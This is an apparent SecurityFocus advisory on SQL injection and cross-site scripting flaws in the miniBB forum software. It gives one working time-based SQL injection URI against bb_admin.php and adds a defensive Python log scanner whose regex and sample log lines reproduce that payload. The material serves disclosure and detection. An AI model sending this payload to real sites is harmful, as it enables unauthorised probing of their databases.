miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities

Attackers can use a browser to exploit the SQL-injection issue. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issues.

The following example URI is available:

http://www.example.com/bb_admin.php?action=searchusers2&searchus=id&whatus='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
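
For defenders, the following added example (not part of the original advisory, and not miniBB code) scans web-server access-log lines for requests to bb_admin.php whose whatus or searchus values carry SQL constructs like those in the URI above. The log lines, the combined log format, and the names flag_request and scan are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters of bb_admin.php that appear in the advisory's example URI.
WATCHED_PARAMS = ("whatus", "searchus")

# SQL constructs that have no place in a user-search value. A bare quote is
# deliberately not matched, so a name such as O'Brien is not flagged.
SUSPICIOUS = re.compile(r"\bselect\b|\bunion\b|\bsleep\s*\(|\bbenchmark\s*\(", re.I)

# Request line of a combined-log-format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')

def flag_request(log_line):
    """Return [(param, decoded_value), ...] for suspicious watched parameters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/bb_admin.php"):
        return []
    # parse_qs percent-decodes values and turns '+' into a space.
    query = parse_qs(url.query, keep_blank_values=True)
    return [(name, value)
            for name in WATCHED_PARAMS
            for value in query.get(name, [])
            if SUSPICIOUS.search(value)]

def scan(lines):
    """Return [(client_ip, hits), ...] for every line with at least one hit."""
    results = []
    for line in lines:
        hits = flag_request(line)
        if hits:
            results.append((line.split(" ", 1)[0], hits))
    return results

# Constructed sample log lines (documentation IP range 192.0.2.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /bb_admin.php?action=searchusers2&searchus=id&whatus=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2010:10:02:11 +0000] "GET /bb_admin.php?action=searchusers2&searchus=id&whatus=%27+(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)+%27 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2010:10:03:40 +0000] "GET /bb_admin.php?action=searchusers2&searchus=username&whatus=O%27Brien HTTP/1.1" 200 5120',
    '192.0.2.33 - - [01/Jan/2010:10:04:02 +0000] "GET /index.php?whatus=select HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

A time-delay payload also tends to show up as an unusually long response time for the same request, so pairing this match with the server's request-duration field, where logged, helps confirm a hit.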


 

Copyright 2010, SecurityFocus